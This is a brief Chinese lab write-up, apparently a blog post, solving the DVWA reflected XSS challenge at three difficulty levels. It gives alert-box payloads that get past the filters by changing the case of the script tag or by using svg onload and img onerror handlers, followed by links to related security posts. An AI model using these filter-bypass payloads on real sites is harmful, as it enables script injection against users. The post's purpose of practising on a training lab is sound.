一、低级low
简单拿捏
<script>alert(123)</script>
二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>
三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
云空43 分钟前
《DeepSeek 网页/API 性能异常(DeepSeek Web/API Degraded Performance):网络安全日志》doubt。1 小时前
8.攻防世界Web_php_wrong_nginx_configaaaweiaaaaaa4 小时前
php的使用及 phpstorm环境部署泪不是Web妳而流9 小时前
BurpSuite抓包与HTTP基础doubt。10 小时前
3.攻防世界Web_php_unserializedoubt。13 小时前
1.攻防世界easyphp浩浩测试一下21 小时前
渗透测试之WAF组合条件绕过方式手法详解以及SQL注入参数污染绕过codkingo1 天前
CSRF 跨站请求伪造漏洞doubt。1 天前
【BUUCTF】[羊城杯 2020]Blackcat1仇辉攻防1 天前
【AI】DeepSeek 概念/影响/使用/部署